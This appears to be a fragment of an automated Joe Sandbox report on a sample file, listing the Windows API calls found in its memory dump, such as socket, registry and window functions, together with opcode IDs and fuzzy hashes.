• Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                  • String ID:
                                                  • API String ID: 395352322-0
                                                  • Opcode ID: 446a3ada143294340012bd2efac537eb9143a17aec924a8ce61e1d02981ad47a
                                                  • Instruction ID: 974a86a28d34efed373078a8cfbc8363af2e0110577dc1a775173a81794479b6
                                                  • Opcode Fuzzy Hash: 446a3ada143294340012bd2efac537eb9143a17aec924a8ce61e1d02981ad47a
                                                  • Instruction Fuzzy Hash: 25315CB1915109BFEB14DB94DC99EFFB7BCEF09300F000169E511E2581EB749F859AA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0090655B
                                                  • GetWindowLongW.USER32(00AD23F8,000000F0), ref: 0090658E
                                                  • GetWindowLongW.USER32(00AD23F8,000000F0), ref: 009065C3
                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009065F5
                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0090661F
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00906630
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0090664A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: 48dd40e5bf1aca74760e9e04eb9665c84c2ce698189aac5c201e298db64a5e14
                                                  • Instruction ID: 775483ca1ec33792bdb35bd4a16708bdbb2227d47894767d9bf491e271b6e2dc
                                                  • Opcode Fuzzy Hash: 48dd40e5bf1aca74760e9e04eb9665c84c2ce698189aac5c201e298db64a5e14
                                                  • Instruction Fuzzy Hash: 28310075618214AFDB208F28DC89F553BE9FB4A714F1801A8F501CB2F6CB62A960EB41
                                                  APIs
                                                    • Part of subcall function 008F80A0: inet_addr.WS2_32(00000000), ref: 008F80CB
                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 008F64D9
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F64E8
                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 008F6521
                                                  • connect.WSOCK32(00000000,?,00000010), ref: 008F652A
                                                  • WSAGetLastError.WS2_32 ref: 008F6534
                                                  • closesocket.WS2_32(00000000), ref: 008F655D
                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 008F6576
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 910771015-0
                                                  • Opcode ID: e5e6fb5ecbdfc7e6e57f8488929e25e236d5c8984a3e9a13defaf33edfbf8f0a
                                                  • Instruction ID: 5ad11d4f11b1ebc1bb410c65989054c78dc85cd50bb929b8bd629fac64a5a4ce
                                                  • Opcode Fuzzy Hash: e5e6fb5ecbdfc7e6e57f8488929e25e236d5c8984a3e9a13defaf33edfbf8f0a
                                                  • Instruction Fuzzy Hash: 8A31B33160011CAFDB10AF64CC85BBE7BA9FB44714F048169FE46E7291EB70AD14DBA2
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DE0FA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DE120
                                                  • SysAllocString.OLEAUT32(00000000), ref: 008DE123
                                                  • SysAllocString.OLEAUT32 ref: 008DE144
                                                  • SysFreeString.OLEAUT32 ref: 008DE14D
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 008DE167
                                                  • SysAllocString.OLEAUT32(?), ref: 008DE175
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: f1fd504efaee231de7a71e4e99ac4a8f5ddf3e75bd37677afc3d65e25cfcaa13
                                                  • Instruction ID: 90481273abc441c6c4ffb37967d3f236cf85a6686e392539c29b27c6a0705b79
                                                  • Opcode Fuzzy Hash: f1fd504efaee231de7a71e4e99ac4a8f5ddf3e75bd37677afc3d65e25cfcaa13
                                                  • Instruction Fuzzy Hash: 17213235604208AFDF20AFA8DC88DAB77ADFB09760B108226F955CB660DA70DD419B64
                                                  APIs
                                                    • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                                    • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                                    • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009078A1
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009078AE
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009078B9
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009078C8
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009078D4
Memory Dump Source
• Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
                                                  • Opcode ID: 45674916aad674e9c7d9f28f8b4e6e70a5869568097598799963cc256563d477
                                                  • Instruction ID: 1a1ce6ffeb272801590325e0c94039995a3b99d78ca89a4f70da820b9f26c0bc
                                                  • Opcode Fuzzy Hash: 45674916aad674e9c7d9f28f8b4e6e70a5869568097598799963cc256563d477
                                                  • Instruction Fuzzy Hash: F811B6B2514219BFEF159F60CC85EE77F5DEF48768F018114FA04A2090C772AC21DBA0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 008A41E3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 008A41EA
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 008A41F6
                                                  • RtlDecodePointer.NTDLL(00000001), ref: 008A4213
Memory Dump Source
• Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoInitialize$combase.dll
                                                  • API String ID: 3489934621-340411864
                                                  • Opcode ID: 54a7d21f299d0cd1f1d5722199ce3ca291d882c3667d257f2929df40abf8aaaf
                                                  • Instruction ID: 0bd4d042148d1c881cc35ff4bc2bfe17cbea778dce8db2905e4fb8bdc406cde5
                                                  • Opcode Fuzzy Hash: 54a7d21f299d0cd1f1d5722199ce3ca291d882c3667d257f2929df40abf8aaaf
                                                  • Instruction Fuzzy Hash: 5BE0E5B86B8744AEEB206BB0EC19F443AA4B7AAB46F109424B421E54E0DBB555D5AA00
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008A41B8), ref: 008A42B8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 008A42BF
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 008A42CA
                                                  • RtlDecodePointer.NTDLL(008A41B8), ref: 008A42E5
Memory Dump Source
• Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoUninitialize$combase.dll
                                                  • API String ID: 3489934621-2819208100
                                                  • Opcode ID: 5cb3b7a6ae022567cb01f1941fdebf0b73e2e3a5f2872093f929d507415d5ae4
                                                  • Instruction ID: 5d4e5b4c462c316eb0a4b3c1bd4a9b7a97b780d2014156f00b3ecfccf2825a5b
                                                  • Opcode Fuzzy Hash: 5cb3b7a6ae022567cb01f1941fdebf0b73e2e3a5f2872093f929d507415d5ae4
                                                  • Instruction Fuzzy Hash: F6E0BF7C66D3019FEB209B60FD1EF443AA4F769B46F205034F011E58A0CBB54694FB14
                                                  APIs
                                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 008F6F14
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F6F48
                                                  • htons.WS2_32(?), ref: 008F6FFE
                                                  • inet_ntoa.WS2_32(?), ref: 008F6FBB
                                                    • Part of subcall function 008DAE14: _strlen.LIBCMT ref: 008DAE1E
                                                    • Part of subcall function 008DAE14: _memmove.LIBCMT ref: 008DAE40
                                                  • _strlen.LIBCMT ref: 008F7058
                                                  • _memmove.LIBCMT ref: 008F70C1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                  • String ID:
                                                  • API String ID: 3619996494-0
                                                  • Opcode ID: adf63a76ee5cab22f3d1a8fedd9c270dfab32fd540c1d51c58537f8e1a4c30d2
                                                  • Instruction ID: 213b1a3ceffbf999003e35ee1e0bac71f6db1d7fbd8172d02f0c14d68de72bc9
                                                  • Opcode Fuzzy Hash: adf63a76ee5cab22f3d1a8fedd9c270dfab32fd540c1d51c58537f8e1a4c30d2
                                                  • Instruction Fuzzy Hash: F381BD72508304ABD710EB28CC86E7BB7E9FF84714F144A19F655DB292DA71AD04CB92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 3253778849-0
                                                  • Opcode ID: b988335914520bef721cd9ef6a6c77dcc7cd2b99d2a19202a30f694f12b87c20
                                                  • Instruction ID: ebdfd24a58964f9778a096f488cfb7f7840bcfda2c6d43044ff16272c06b1d91
                                                  • Opcode Fuzzy Hash: b988335914520bef721cd9ef6a6c77dcc7cd2b99d2a19202a30f694f12b87c20
                                                  • Instruction Fuzzy Hash: F0618A3050069A9BDF11FF29CC81EFE3BA4FF56348F084519F8959B292EA34AD51CB52
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 009010A5: CharUpperBuffW.USER32(?,?), ref: 009010BC
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900548
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00900588
                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009005AB
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009005D4
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00900617
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00900624
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                  • String ID:
                                                  • API String ID: 4046560759-0
                                                  • Opcode ID: efe1494d5d576f31d73c9dcc9bb79d681267b88bf8c80ec29403da85411b8b1b
                                                  • Instruction ID: 80c7b07dbfd8611953a514d6712223e020e9f759568859251d274f3c46c6a807
                                                  • Opcode Fuzzy Hash: efe1494d5d576f31d73c9dcc9bb79d681267b88bf8c80ec29403da85411b8b1b
                                                  • Instruction Fuzzy Hash: D7514731208200AFDB14EB28C885E6EBBF9FF89714F04492DF595972A1DB31EA04DB52
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 00905A82
                                                  • GetMenuItemCount.USER32(00000000), ref: 00905AB9
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00905AE1
                                                  • GetMenuItemID.USER32(?,?), ref: 00905B50
                                                  • GetSubMenu.USER32(?,?), ref: 00905B5E
                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00905BAF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountMessagePostString
                                                  • String ID:
                                                  • API String ID: 650687236-0
                                                  • Opcode ID: b817d8fe4e5a2ffa4819728a39abb61e6eec8db115ff1a465a63c3ca54b3e615
                                                  • Instruction ID: 45a0a847dc5e9f07852c1efb990a81c48985a08d0f68327c731c62a8e014a19f
                                                  • Opcode Fuzzy Hash: b817d8fe4e5a2ffa4819728a39abb61e6eec8db115ff1a465a63c3ca54b3e615
                                                  • Instruction Fuzzy Hash: 35515C35A00619AFDB11EFA8C845AAEBBB4FF48310F154469E852E7391CB74AE41CF91
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 008DF3F7
                                                  • VariantClear.OLEAUT32(00000013), ref: 008DF469
                                                  • VariantClear.OLEAUT32(00000000), ref: 008DF4C4
                                                  • _memmove.LIBCMT ref: 008DF4EE
                                                  • VariantClear.OLEAUT32(?), ref: 008DF53B
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008DF569
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                  • String ID:
                                                  • API String ID: 1101466143-0
                                                  • Opcode ID: 30aa81a10de89e2f08e6c912ce081ccfbfc75c2343b528edde0d8bca05a0d397
                                                  • Instruction ID: 5cb52ddaecf2cd2d0871b4f9d09d416b2fbe47a04026076ad2b9202ffd251f73
                                                  • Opcode Fuzzy Hash: 30aa81a10de89e2f08e6c912ce081ccfbfc75c2343b528edde0d8bca05a0d397
                                                  • Instruction Fuzzy Hash: 84516AB5A00209EFCB10CF58D884AAAB7F9FF4C314B15816AEE59DB311D730E951CBA0
                                                  APIs
                                                  • _memset.LIBCMT ref: 008E2747
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2792
                                                  • IsMenu.USER32(00000000), ref: 008E27B2
                                                  • CreatePopupMenu.USER32 ref: 008E27E6
                                                  • GetMenuItemCount.USER32(000000FF), ref: 008E2844
                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 008E2875
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                  • String ID:
                                                  • API String ID: 3311875123-0
                                                  • Opcode ID: 190ea18e37b38799b7a1a78de091952d225a98776b543ce2c742fe90b2b6a46c
                                                  • Instruction ID: 50288e62baad466868a0fb0e22420a81b30e72e09fd6856fd2cdf11daafce5ed
                                                  • Opcode Fuzzy Hash: 190ea18e37b38799b7a1a78de091952d225a98776b543ce2c742fe90b2b6a46c
                                                  • Instruction Fuzzy Hash: 1151A370900399DFDF24CF6AD888AAEBBF9FF46314F104169E825DB291D7709944CB52
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • BeginPaint.USER32(?,?), ref: 0088179A
                                                  • GetWindowRect.USER32(?,?), ref: 008817FE
                                                  • ScreenToClient.USER32(?,?), ref: 0088181B
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0088182C
                                                  • EndPaint.USER32(?,?), ref: 00881876
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                  • String ID:
                                                  • API String ID: 1827037458-0
                                                  • Opcode ID: 6cd970346a83e37c4fdb45bd21763514eb96b77ecfe6e8527d0256d883aeb687
                                                  • Instruction ID: 8d3346a2bc242a433b3314be7a16250a241a8ba592473d41469679f0a9574d1c
                                                  • Opcode Fuzzy Hash: 6cd970346a83e37c4fdb45bd21763514eb96b77ecfe6e8527d0256d883aeb687
                                                  • Instruction Fuzzy Hash: E24192705083059FDB20EF24CC89FB67BE8FB4A724F140629F554C72A1CB719946EB62
                                                  APIs
                                                  • ShowWindow.USER32(009467B0,00000000), ref: 0090B9CC
                                                  • EnableWindow.USER32(00000000,00000000), ref: 0090B9F0
                                                  • ShowWindow.USER32(009467B0,00000000), ref: 0090BA50
                                                  • ShowWindow.USER32(00000000,00000004), ref: 0090BA62
                                                  • EnableWindow.USER32(00000000,00000001), ref: 0090BA86
                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0090BAA9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
